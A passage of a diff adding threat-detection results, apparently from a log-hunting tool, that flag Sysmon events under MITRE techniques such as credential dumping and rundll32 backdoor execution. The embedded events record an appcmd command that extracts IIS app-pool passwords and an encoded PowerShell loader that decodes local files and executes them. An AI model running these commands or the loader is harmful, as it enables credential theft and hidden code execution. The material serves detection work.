+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
+    </TimeCreated>
+    <EventRecordID>29</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Credential Vault Client Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
+    </TimeCreated>
+    <EventRecordID>29</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Credential Vault Client Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.731362Z"">
+    </TimeCreated>
+    <EventRecordID>5898</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.691</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00104474FF00</Data>
+    <Data Name=""ProcessId"">2448</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>8</EventID>
+    <Version>2</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
+    </TimeCreated>
+    <EventRecordID>9066</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""316"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
+    <Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
+    <Data Name=""SourceProcessId"">1532</Data>
+    <Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
+    <Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
+    <Data Name=""TargetProcessId"">492</Data>
+    <Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""NewThreadId"">3656</Data>
+    <Data Name=""StartAddress"">0x001A0000</Data>
+    <Data Name=""StartModule""></Data>
+    <Data Name=""StartFunction""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
+    </TimeCreated>
+    <EventRecordID>243552</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
+    <Data Name=""ProcessId"">6572</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
+    </TimeCreated>
+    <EventRecordID>243552</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
+    <Data Name=""ProcessId"">6572</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.661261Z"">
+    </TimeCreated>
+    <EventRecordID>5895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.621</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108270FF00</Data>
+    <Data Name=""ProcessId"">1340</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
+    </TimeCreated>
+    <EventRecordID>243552</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
+    <Data Name=""ProcessId"">6572</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
